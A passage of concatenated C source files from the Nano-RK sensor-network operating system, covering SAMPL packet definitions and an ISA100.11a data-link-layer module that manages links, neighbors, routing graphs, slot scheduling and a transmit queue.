// This function returns a computed checksum to compare against the normal checksum
uint8_t transducer_cmd_pkt_get( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
uint8_t transducer_cmd_pkt_add( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
uint8_t transducer_reply_pkt_add( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index );
uint8_t transducer_reply_pkt_get( TRANSDUCER_REPLY_PKT_T *p, uint8_t *buf, uint8_t index );
uint8_t transducer_cmd_pkt_checksum( TRANSDUCER_CMD_PKT_T *p, uint8_t *buf);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/include/sampl.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef SAMPL_H
#define SAMPL_H
#include <stdint.h>
#ifndef NRK_ERROR
#define NRK_ERROR (-1)
#endif
#ifndef NRK_OK
#define NRK_OK 1
#endif
// #define DEBUG_TXT
#define MAX_PKT_PAYLOAD (120-US_PAYLOAD_START)
#define GATEWAY_MAC 0
/* NOTE: THE SIZE OF CONTROL PACKET SHOULD BE LESS THAN RF_MAX_PAYLOAD_SIZE */
#define MAX_NODES 30
#define WORDS_PER_NODE 2
#define SAMPL_ID 1
#define SAMPL_VERSION 1
#define FAST_CHECK_RATE 100
#define BROADCAST 255
// limits
#define MAX_NAV 240
#define MAX_DELAY_PER_LEVEL 5
#define MAX_HOPS 32
#define DEFAULT_CHECK_RATE 100
// error flags for packets
#define HOP_ERROR_MASK 0x01
#define NAV_ERROR_MASK 0x02
#define DELAY_PER_LEVEL_ERROR_MASK 0x04
#define MAX_HOPS_ERROR_MASK 0x08
// ctrl_flag MASKS
#define DS_MASK 0x01
#define US_MASK 0x02
#define TREE_FILTER 0x04
#define LED_FLOOD 0x08
#define LINK_ACK 0x10
#define ENCRYPT 0x20
#define MOBILE_MASK 0x40
#define DEBUG_FLAG 0x80
// PKT Types
#define EMPTY_PKT 0x00
#define PING_PKT 0x01
#define WIRELESS_UPDATE_PKT 0x02
#define ACK_PKT 0x03
#define ERROR_PKT 0x04
#define ROUTE_PKT 0x05
#define FF_SENSOR_LONG_PKT 0x06
#define FF_SENSOR_SHORT_PKT 0x07
#define TRACEROUTE_PKT 0x08
#define CONTROL_PKT 0x09
#define LED_CONTROL_PKT 0x0a
#define DATA_STORAGE_PKT 0x0b
#define XMPP_PKT 0x0c
#define STATS_PKT 0x0d
#define SUBNET_NEIGHBOR_LIST_PKT 0x0e
#define EXTENDED_NEIGHBOR_LIST_PKT 0x0f
#define TRANSDUCER_REPLY_PKT 0x10
#define TRANSDUCER_CMD_PKT 0x11
#define UNKNOWN_PKT 0xff
// UNKNOWN_PKT used by phoenix etc, do not remove
// Common to all packets
#define PROTOCOL_ID 0
#define PROTOCOL_VERSION 1
#define CTRL_FLAGS 2
#define PKT_TYPE 3
#define SEQ_NUM 4
#define PRIORITY 5
#define ACK_RETRY 5
#define SUBNET_MAC 8 // when operating in 8 bit mode
#define SUBNET_MAC_2 6
#define SUBNET_MAC_1 7
#define SUBNET_MAC_0 8
// Common to downstream packets
#define DS_LAST_HOP_MAC 9
#define DS_HOP_CNT 10
#define DS_HOP_MAX 11
#define DS_DELAY_PER_LEVEL 12
#define DS_NAV 13
#define DS_MAC_CHECK_RATE 14
#define DS_RSSI_THRESHOLD 15
#define DS_AES_CTR_3 16
#define DS_AES_CTR_2 17
#define DS_AES_CTR_1 18
#define DS_AES_CTR_0 19
#define DS_MAC_FILTER_LIST_SIZE 20
#define DS_PAYLOAD_START 21
// Common to upstream reply packets
#define US_LAST_HOP_SRC_MAC 9
#define US_NEXT_HOP_DST_MAC 10
#define US_ERROR_CODE 11
#define US_NUM_MSGS 12
#define US_PAYLOAD_START 13
// Common to mobile packets
#define P2P_SRC_MAC 9
#define P2P_DST_MAC 10
#define P2P_LAST_HOP_MAC 11
#define P2P_NEXT_HOP_MAC 12
#define P2P_TTL 13
#define P2P_CHECK_RATE 14
#define P2P_PAYLOAD_START 15
// Common to gateway packets
#define GW_LAST_HOP_MAC 9
#define GW_RSSI 10
#define GW_SRC_MAC 11
#define GW_DST_MAC 12
#define GW_ERROR_CODE 13
#define GW_NUM_MSGS 14
#define GW_PAYLOAD_START 15
typedef struct sampl_downstream_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t seq_num;
uint8_t priority;
uint8_t ack_retry;
uint8_t subnet_mac[3];
// DS Specific Payload
uint8_t hop_cnt;
uint8_t hop_max;
uint8_t delay_per_level;
uint8_t nav;
uint8_t mac_check_rate;
int8_t rssi_threshold;
uint8_t last_hop_mac;
uint8_t mac_filter_num;
uint8_t aes_ctr[4];
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
uint8_t is_mac_selected;
int8_t rssi;
} SAMPL_DOWNSTREAM_PKT_T;
typedef struct sampl_gateway_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// GW Specific Values
uint8_t error_code;
uint8_t num_msgs;
uint8_t src_mac;
uint8_t dst_mac; // 255 is a broadcast
uint8_t last_hop_mac;
int8_t rssi;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
}SAMPL_GATEWAY_PKT_T;
typedef struct sampl_upstream_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// US Specific Values
uint8_t error_code; // Allow errors to be sent up
uint8_t next_hop_dst_mac;
uint8_t last_hop_src_mac;
uint8_t num_msgs;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
int8_t rssi;
}SAMPL_UPSTREAM_PKT_T;
typedef struct sampl_peer_2_peer_pkt
{
// Common Header
uint8_t protocol_id;
uint8_t protocol_version;
uint8_t pkt_type;
uint8_t ctrl_flags;
uint8_t subnet_mac[3];
uint8_t ack_retry;
uint8_t priority;
uint8_t seq_num;
// General Purpose Packet Specific
uint8_t ttl; // Time to live
uint8_t src_mac;
uint8_t dst_mac; // 255 is a broadcast
uint8_t last_hop_mac;
uint8_t next_hop_mac;
uint8_t check_rate;
// Buffer Management
uint8_t payload_start;
uint8_t *buf;
uint8_t buf_len;
uint8_t *payload;
uint8_t payload_len;
// Special Flags
int8_t rssi;
}SAMPL_PEER_2_PEER_PKT_T;
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/dlmo.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
#include <isa_error.h>
#include <dmo.h>
#include <dlmo.h>
#include <isa_messagetypes.h>
//********************** Global variables*************************************
volatile DLMO_LINK dlmoLink[DLMO_LINK_MAX_COUNT];
volatile DLMO_NEIGHBOR dlmoNeighbor[DLMO_NEIGHBOR_MAX_COUNT];
volatile DLMO_GRAPH dlmoGraph[DLMO_GRAPH_MAX_COUNT];
volatile ISA_QUEUE isaQueue[TRANSMIT_QUEUE_MAX_SIZE] ;
volatile DLMO_CANDIDATE dlmoCandidate;
//ISA_QUEUE *isaQueuePointer[TRANSMIT_QUEUE_MAX_SIZE]
uint8_t isa_sched[ISA_SLOTS_PER_FRAME];
uint64_t isa_tdma_rx_mask; //should not need this
uint64_t isa_tdma_tx_mask; // should not need this
uint64_t isa_slot; //Set to 1 if slot is in use
uint8_t isaTxQueueSize; //holds the number of elements present in the Queue
/* Device management object*/
DMO dmo;
DLMO_DISCOVERY_ALERT discoveryAlert;
/* Variables for neighbor table transmission */
nrk_time_t lastSentTime;
uint8_t nbr_buf[RF_MAX_PAYLOAD_SIZE];
//********************Local function definitions***********************************
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, uint8_t graphType);
void dlmoInit();
DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3);
int8_t addLink(uint8_t slotNumber, uint16_t neighborId,uint16_t graphId , LinkType linkType, GraphType graphType);
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate);
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry ,status));
void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload);
void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status)) ;
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status));
void isaFreePacket(ISA_QUEUE *entry);
/*------------------------------------------------- dlmoInit() -----
| Function dlmoInit()
|
| Purpose: Called during initialization. This can also be used later to reset to
| factory defaults if required. In its current state, it doesn't really do much
| except set the neighbor table reporting duration
|
|
| Parameters:
| NONE
|
| Returns:
| NONE
*-------------------------------------------------------------------*/
void dlmoInit()
{
uint8_t i;
//for LINK
for (i=0; i<DLMO_LINK_MAX_COUNT; i++)
{
(dlmoLink[i].isPresent = false);
}
//for NEIGHBOR
for(i=0; i<DLMO_NEIGHBOR_MAX_COUNT; i++)
{
dlmoNeighbor[i].isPresent = false;
}
//Initialization for Transmit Queue
isaTxQueueSize = 0; //Explicitly initialize this to 0
/*
for(i=0; i<TRANSMIT_QUEUE_MAX_SIZE; i++)
{
isaQueuePointer[i] = &isaQueue[i];
}
*/
// Initialize the dlmo.DiscoveryAlery field
/* Device management object*/
discoveryAlert.alertReport.alertReportDisabled = false;
discoveryAlert.duration = 60; //in seconds
//initialize the lastSentTime to the startTime
nrk_time_get(&lastSentTime);
}
DLMO_GRAPH* findGraph(uint16_t graphId){
for(uint8_t i=0;i<DLMO_GRAPH_MAX_COUNT;i++)
{
if(graphId == dlmoGraph[i].index) return &dlmoGraph[i];
}
return NULL;
}
DLMO_NEIGHBOR* findNeighbor(uint16_t neighborId){
for(uint8_t i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(neighborId == dlmoNeighbor[i].index) return &dlmoNeighbor[i];
}
return NULL;
}
/*------------------------------------------------- addLink() -----
| Function addLink()
|
| Purpose: Used to add/update a link. If the link is already present, its contents will get updated.
|
|
| Parameters:
| (IN)uint8_t slotNumber - This is curretly stored as channelOffset and represents the slot at which this link appears.
| (IN)DLMO_NEIGHBOR* neighborIndex - Pointer to the neighbor that is stored in this link. This parameter can also be NULL in the case of
| an ADV or RX link.
| (IN)DLMO_GRAPH* graphPtr - Pointer to the graph that is stored in this link. This parameter can also be NULL in the case of an ADV or
| RX link.
| (IN)LinkType linkType - Represents the linkType
| JOIN_RESP,
| TX_NO_ADV,
| TX_RX_NO_ADV,
| TX_ADV,
| ADV,
| BURST_ADV,
| BURST_ADV_SCAN,
| SOLICITATION,
| RX
| (IN)GraphType graphType - Additional type of TX link. This represents whether the link can be used to forward directly to a NEIGHBOR, or
| if the link is used only for a message that is destined for a GRAPH or if both GRAPH and NEIGHBOR (GRAPH) being
| given preference
| Returns:
| ISA_SUCCESS
| ISA_ERROR
*-------------------------------------------------------------------*/
int8_t addLink(uint8_t slotNumber, uint16_t neighborId, uint16_t graphId , LinkType linkType, GraphType graphType)
{
uint8_t index;
int8_t freeIndex = -1;
DLMO_NEIGHBOR* neighborPtr = NULL; // neighbor pointer to store
DLMO_GRAPH* graphPtr = NULL; // graph pointer to store
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range\r\n");
return;
}
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (freeIndex==-1 && dlmoLink[index].isPresent == false) freeIndex = index;
if (dlmoLink[index].chOffset == slotNumber) {
printf ("Slot %d already configured- updating\r\n",slotNumber);
freeIndex = index;
goto UPDATE_LINK;
}
}
if (freeIndex == -1)
{
setIsaError(LINK_CAPACITY_ERROR);
printIsaError();
return ISA_ERROR;
}
//we have found a free index
UPDATE_LINK:
if (linkType == TX_NO_ADV){
//find the neighbor pointer
if (neighborId!=0)
{
neighborPtr = findNeighbor(neighborId);
}
//find the graph pointer
if (graphId!=0)
{
graphPtr = findGraph(graphId);
}
}
printf("Added link at index %d\r\n",freeIndex);
dlmoLink[freeIndex].isPresent = true;
dlmoLink[freeIndex].neighbor = neighborPtr;
dlmoLink[freeIndex].graphPtr = graphPtr;
dlmoLink[freeIndex].linkType = linkType;
//reset the previous slot number before updating
// isa_slot &= ~(((uint64_t) 1) << dlmoLink[freeIndex].chOffset);
dlmoLink[freeIndex].chOffset = slotNumber;
dlmoLink[freeIndex].graphPtr = graphPtr;
dlmoLink[freeIndex].typeInfo = ISASET(dlmoLink[index].typeInfo, SHIFTLEFT(graphType, GRAPH_TYPE_BIT));
// channel offset implementation will change as the protocol develops
//record that the slot is in use- used to calculate next wakeup
if(slotNumber == 23) putchar('x');
isa_slot |= ((uint64_t) 1) << slotNumber;
return ISA_SUCCESS;
}
/*------------------------------------------------- findLink() -----
| Function findLink()
|
| Purpose: This returns a pointer to a link that corresponds to the slot that is passes to it.
| The functions runs through the dlmoLink[] array and compares the slot with the channel offset parameter
| for valid links.
|
|
| Parameters:
| (IN)uint8_t slot - Slot for which we want the link pointer
|
| Returns:
| DLMO_LINK * - Pointer to the link that corresponds to the slot passed as an argument.
*-------------------------------------------------------------------*/
DLMO_LINK * findLink(uint8_t slot){
uint8_t index;
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
if (dlmoLink[index].isPresent == true && dlmoLink[index].chOffset == slot ) {
return &dlmoLink[index];
}
}
printf ("This slot is not configured yet: %d\n\r" , slot);
return NULL;
}
/*------------------------------------------------- isTransmitLinkPresent() -----
| Function isTransmitLinkPresent()
|
| Purpose: This function is called before we enqueue something in the queue in order to determine if
| we have a link that can be used to send this message
| We know we have a TX link if either -
| 1) The graphType is NEIGHBOR or GRAPH_NEIGHBOR and the DEST_ID of the message is equal to the
| neighbor on the link or
| 2) the graph_id of the message corresponds to the graphId of the link and the graphType(of the link) is GRAPH or GRAPH_NEIGHBOR
| This function runs through all the links to find if either 1 or 2 is true
|
|
| Parameters:
| (IN)uint8_t *payload - Pointer to the message payload
|
| Returns:
| true
| false
*-------------------------------------------------------------------*/
bool isTransmitLinkPresent (uint8_t *payload){
uint8_t index;
uint8_t graphType;
//check the link type
DLMO_DROUT * dRout = &payload[DROUT_INDEX];
for (index = 0; index < DLMO_LINK_MAX_COUNT; index++)
{
//first find the graph type
graphType = ISAMASK(dlmoLink[index].typeInfo,GRAPH_TYPE_MASK);
graphType = SHIFTRIGHT(graphType,GRAPH_TYPE_BIT);
if (dlmoLink[index].isPresent == true && dlmoLink[index].linkType == TX_NO_ADV ) { //this is a valid TX link
//the link neighbor is equal to payload destID and the graph type is NEIGHBOR or GRAPH_NEIGHBOR or link graphId is equal to the message graphID and the link type is GRAPH or GRAPH_NEIGHBOR
if ((dlmoLink[index].neighbor->index == payload[DEST_INDEX] && (graphType == NEIGHBOR || graphType == GRAPH_NEIGHBOR))|| (dlmoLink[index].graphPtr->index !=0 && dlmoLink[index].graphPtr->index==dRout->GraphId&& (graphType == GRAPH || graphType == GRAPH_NEIGHBOR)) )
return true;
}
}
return false; //we do not have a link that is configured for this graphId
}
/*------------------------------------------------- addNeighbor() -----
| Function addNeighbor()
|
| Purpose: Used to add/update a neighbor. If the neighbor is already present, its contents will get updated.
|
|
| Parameters:
| (IN)uint16_t index - Neighbor ID to store/update
| (IN)uint64_t EUI64 - Currently unused
| (IN)uint8_t groupCode1 - Currently unused
| (IN)uint8_t groupCode2 - Currently unused
| (IN)bool clockSource - TRUE - if this neighbor is my clock source
| FALSE - if this neighbor is not my clock source
| (IN)uint8_t linkBacklogIndex - Currently unused
| (IN)uint8_t linkBacklogDur - Currently unused
| (IN)uint8_t linkBacklogActivate - Currently unused
|
|
| Returns:
| DLMO_NEIGHBOR* - pointer to the neighbor added/updated
*-------------------------------------------------------------------*/
DLMO_NEIGHBOR* addNeighbor(uint16_t index,uint64_t EUI64, uint8_t groupCode1, uint8_t groupCode2, bool clockSource,uint8_t linkBacklogIndex,uint8_t linkBacklogDur, uint8_t linkBacklogActivate)
{
uint8_t i,free_index=0;
bool free_index_present = false;
for(uint8_t i=0;i<DLMO_NEIGHBOR_MAX_COUNT;i++)
{
if(index == dlmoNeighbor[i].index && dlmoNeighbor[i].isPresent == true)
{
printf("Neighbor %d Exists in Table - updating\n\r",index);
free_index = i;
goto UPDATE_NEIGHBOR;
}
if(dlmoNeighbor[i].isPresent == false && free_index_present == false)
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(NEIGHBOR_CAPACITY_ERROR);
printIsaError();
return NULL;
}
else
{
printf("Added Neighbor at Index %d\r\n",free_index);
UPDATE_NEIGHBOR:
dlmoNeighbor[free_index].index = index;
dlmoNeighbor[free_index].isPresent = true;
dlmoNeighbor[free_index].EUI64 = EUI64;
dlmoNeighbor[free_index].groupCode1 = groupCode1;
dlmoNeighbor[free_index].groupCode2 = groupCode2;
if(clockSource == true) dlmoNeighbor[free_index].typeInfo = ISASET(dlmoNeighbor[free_index].typeInfo,CLOCK_PREFERRED);
dlmoNeighbor[free_index].linkBacklogIndex = linkBacklogIndex;
dlmoNeighbor[free_index].linkBacklogDur = linkBacklogDur;
dlmoNeighbor[free_index].linkBacklogActivate = linkBacklogActivate;
return &dlmoNeighbor[free_index];
}
}
/*------------------------------------------------- addGraph() -----
| Function addGraph()
|
| Purpose: Used to add/update a graph . If the graph is already present, its contents will get updated.
|
|
| Parameters:
| (IN)uint16_t graphId - Graph ID to store/update
| (IN)uint8_t neighborCount - Number of neighbors in the preference list
| (IN)uint16_t n1 - Neighbor 1 (higher priority)
| (IN)uint16_t n2 - Neighbor 2
| (IN)uint16_t n3 - Neighbor 3
|
| Returns:
| DLMO_GRAPH* - pointer to the graph added/updated
*-------------------------------------------------------------------*/
DLMO_GRAPH* addGraph(uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3){
//printf("AddGraph Graph ID: %d\r\n",graphId);
uint8_t i,free_index=0;
bool free_index_present = false;
for(uint8_t i=0;i<DLMO_GRAPH_MAX_COUNT;i++)
{
if(graphId == dlmoGraph[i].index)
{
printf("Graph %d Exists in Table -updating\n\r",graphId);
free_index = i;
goto UPDATE_GRAPH;
}
if(dlmoGraph[i].index == 0 && free_index_present == false) //is not configured
{
free_index_present = true;
free_index = i;
}
}
if(free_index_present == false)
{
setIsaError(GRAPH_CAPACITY_ERROR);
printIsaError();
return NULL;
}
else
{
printf("Added graph at index %d\r\n",free_index);
UPDATE_GRAPH:
dlmoGraph[free_index].index = graphId;
dlmoGraph[free_index].info = ISASET(SHIFTLEFT(neighborCount, NEIGHBOR_COUNT_LOWER_BIT), dlmoGraph[free_index].info ); //set the neighbor count
dlmoGraph[free_index].neighbor[0] = n1;
dlmoGraph[free_index].neighbor[1] = n2;
dlmoGraph[free_index].neighbor[2] = n3;
return &dlmoGraph[free_index];
}
}
/*
void configureSlot(uint8_t slotNumber, uint16_t neighborId, LinkType linkType, bool clockSource, uint16_t graphId, uint8_t neighborCount, uint16_t n1, uint16_t n2, uint16_t n3, GraphType graphType)
{
DLMO_NEIGHBOR* neighborIndex;//store the neighbor index to pass to addLink()
DLMO_GRAPH* graphPtr ;
if (slotNumber >= ISA_MAX_SLOTS) {
printf ("Slot number not in range");
return;
}
if (linkType == TX_NO_ADV){
//Call the function to add a neighbor as long as neighboe ID is not zero
if (neighborId!=0)
{
putchar('z');
neighborIndex = addNeighbor(neighborId,0, 0, 0, clockSource,0,0, 0);
if (neighborIndex == NULL)//
{
printIsaError();
return;
}
}
if (graphId !=0){
putchar('y');
graphPtr = addGraph(graphId, neighborCount, n1, n2, n3);
if (graphPtr == NULL)//
{
printIsaError();
return;
}
}
}
if (addLink(slotNumber, neighborIndex,graphPtr, linkType, graphType) == -1)
{
printIsaError();
return;
}
//record that the slot is in use- used to calculate next wakeup
isa_slot |= ((uint64_t) 1) << slotNumber;
}
*/
/**
* isa_get_slots_until_next_wakeup()
*
* This function returns the absolute number of slots between the current_slot
* and the next RX/TX related wakeup.
*
* Argument: current_slot is the current slot
* Return: uint16_t number of slots until the next wakeup
*/
uint16_t isa_get_slots_until_next_wakeup (uint16_t current_global_slot)
{
uint16_t min_slot;
uint8_t test_slot;
uint8_t wrapped_slot;
uint8_t current_local_slot;
uint64_t testVariable = 0;
current_local_slot = current_global_slot%ISA_SLOTS_PER_FRAME;
// printf("current local slot %d\r\n",current_local_slot);
testVariable |= ((uint64_t)1) << (current_local_slot+1);
for (test_slot = current_local_slot+1; test_slot < ISA_SLOTS_PER_FRAME; test_slot++) {
if(isa_slot & testVariable) { //slot is scheduled
min_slot = test_slot-current_local_slot;
return min_slot;
}
testVariable = testVariable << 1;
}
// scheduled slot wrapped back
testVariable = 1;
for (test_slot = 0; test_slot<=current_local_slot;test_slot++){
if(isa_slot & testVariable){ //slot is scheduled
min_slot = (ISA_SLOTS_PER_FRAME - current_local_slot + test_slot);
return min_slot;
}
testVariable = testVariable << 1;
}
}
// *** Data link layer service access points ****
/********dd_data_request : Service access point used to send data ******************
* SrcAddr (NL source address)
* DestAddr (NL destination address)
* Priority (priority of the payload)
* DE (discard eligible)
* ECN (explicit congestion notification)
* LH (last hop, NL)
* ContractID (ContractID of the payload)
* DSDULength (payload length)
* DSDU (number of octets as per DSDULength)
* DSDUHandle (uniquely identifies each invocation of this primitive)
*
*/
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
//Future - Table lookup based on contract Id and dest address
//Current - contractId is considered as the graphID directly and dest is the destID
//Configure the headers within the payload (whichever applicable)
payload[DEST_INDEX] = destAddr;
//if (contractId!=0)
{
DLMO_DROUT * dRout;
dRout = &payload[DROUT_INDEX];
dRout->GraphId = contractId;
}
return enQueue (destAddr, priority, length, payload, slot_callback);
}
//Wrapper for dd_data_request
void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
if (dd_data_request(0, destAddr, 0, 0, 0, 0, graphId, length, payload, slot_callback) == -1)
{
printIsaError();
}
}
//*******************dd_data_indication: Service access point used to indicate received data************
void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload)
{
// printf("packet is for me");
isa_rx_pkt_release();
}
/*
* Add to queue. Find a free place and insert with current time
*/
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
uint8_t i;
/*
bool passedLowerPriority = false;
bool fixRequired = false;
bool insertionDone = false;
uint8_t lowerPriorityIndex;
uint8_t usedIndex;
ISA_QUEUE * temp;
*/
if (isaTxQueueSize > TRANSMIT_QUEUE_MAX_SIZE){
setIsaError(TRANSMIT_QUEUE_CAPACITY_ERROR);
return ISA_ERROR;
}
//check if length of payload is within bounds
if (length >= RF_MAX_PAYLOAD_SIZE) {
setIsaError(MAX_PAYLOAD_ERROR);
return ISA_ERROR;
}
//if we are here, we should have place to add into the Queue
//find the first free index and insert
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == false){
isaQueue[i].length = length;
isaQueue[i].priority = priority;
isaQueue[i].transmitPending = true;
isaQueue[i].usedSlot = true;
isaQueue[i].neighbor = neighbor;
isaQueue[i].slot_callback = slot_callback;
isaQueue[i].numTries = 0;
memcpy(isaQueue[i].tx_buf, payload, length );//copy the payload
nrk_time_get(&isaQueue[i].time); //copy the time when I was inserted into Queue
isaTxQueueSize++;
break;
}
}
if ( i == TRANSMIT_QUEUE_MAX_SIZE){
printf(" Critical error 2\r\n");
return ISA_ERROR;
}
return ISA_SUCCESS;
//this if evaluates the event in which I have not copied into a slot and find an entry of lower priority
/*
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && insertionDone == false && passedLowerPriority == false && isaQueuePointer[i]->priority < priority && isaQueuePointer[i]->neighbor == neighbor){
passedLowerPriority = true;
lowerPriorityIndex = i;
continue;
}
//if passedLowerPriority == true , then find a slot to insert and insert-> swap pointers for lowerPriority and free
//fix for every index till free index
if (insertionDone == false && isaQueuePointer[i]->usedSlot == false){
//find a free slot to insert
usedIndex = i;
isaQueuePointer[i]->length = length;
isaQueuePointer[i]->priority = priority;
isaQueuePointer[i]->transmitPending = true;
isaQueuePointer[i]->usedSlot = true;
isaQueuePointer[i]->neighbor = neighbor;
memcpy(isaQueuePointer[i]->tx_buf, payload, length );//copy the payload
isaTxQueueSize++;
insertionDone = true;
if (passedLowerPriority == true) break; //IF this is the case, I fix after this loop
continue;
}
if (insertionDone == true && isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority > isaQueuePointer[usedIndex]->priority ){ //Swap
//we come here only if fix required
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
//we can return now if we did not come here through the condition where I inserted after a higher priority
if (passedLowerPriority == false) return 1;
//I am here if I inserted after lower priority. Now I need to take care of fixing that
// I iterate from usedIndex to lowerPriority Index in the backward direction and fix
for (i = usedIndex -1 ; i >= lowerPriorityIndex ; i--)
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority < isaQueuePointer[usedIndex]->priority){
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
return 1;
*/
}
/*
* if numtries is 0 then we should have the preferred link, else take any of the other links if possible
*/
bool isLinkNeigborApplicable(ISA_QUEUE* isaQueue, DLMO_LINK * link)
{
uint8_t i;
if (isaQueue->numTries == 0){
if( link->graphPtr->neighbor[0] == link->neighbor->index ) return true;
return false;
}
//for the number of neighbors configured as alternate routes in this graph
for (i = 0; i< SHIFTRIGHT(ISAMASK(link->graphPtr->info, NEIGHBOR_COUNT_MASK),NEIGHBOR_COUNT_LOWER_BIT );i++){
if (link->graphPtr->neighbor[i] == link->neighbor->index) return true;
}
return false;
}
ISA_QUEUE * getHighPriorityEntry(DLMO_LINK * link){
uint16_t neighbor;
nrk_time_t time;
uint8_t priority = 0;
ISA_QUEUE* tempIndex;
bool found = false;
uint8_t i;
uint8_t graphType;
//check the link type
graphType = ISAMASK(link->typeInfo,GRAPH_TYPE_MASK);
graphType = SHIFTRIGHT(graphType,GRAPH_TYPE_BIT);
if (graphType == 0){ //if the graph type is 0
DIRECT_NEIGHBOR:
if (link->neighbor == NULL || link->neighbor->isPresent == false) return NULL;
neighbor = link->neighbor->index;
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
